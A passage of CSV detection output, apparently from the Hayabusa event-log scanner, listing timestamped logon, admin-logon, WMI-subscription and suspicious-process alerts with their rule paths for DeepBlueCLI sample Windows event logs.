Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x194bb : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:47:07.743 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x19489,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:48:32.133 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:48:32.133 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:49:30.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:49:30.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:54:00.258 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x194bb,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:54:45.140 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:54:45.140 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:54:58.140 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:55:02.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:55:06.370 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:55:06.370 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:55:06.370 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:55:29.463 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x19153 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,informational,Logon Type 2 - 
Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1917f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:55:29.463 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x19153,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:57:31.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:57:31.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:59:43.385 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:17:38.760 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:21:25.557 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:27:57.838 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:38:14.682 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:49:57.323 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 
0x1917f,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:53:53.609 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:53:53.609 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:54:11.078 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:54:23.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 05:54:29.619 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:54:29.619 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:54:29.619 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:55:00.775 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 
05:55:00.775 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b15e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b18a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:55:00.775 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x2b15e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:28.619 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:36.634 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:36.634 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:36.649 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:56:52.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 05:56:52.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:05:37.180 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2b18a,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:07:06.390 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:07:06.390 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:07:31.859 +09:00,IE8Win7,4624,informational,Logon Type 0 - 
System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:07:35.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:07:44.487 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:07:44.487 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:07:44.487 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:09:53.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:09:53.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:10:53.299 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:13:38.283 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:13:38.283 
+09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x25519 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2553c : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:13:38.283 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x25519,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:35:27.013 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:35:27.013 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:35:27.028 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:50:27.138 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: cifs/rdavis-7.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:45.841 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: 
IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:45.841 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:45.841 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:45.919 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.263 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\lsass.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.263 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f53a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.263 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f546 : (Warning: Credentials are stored in 
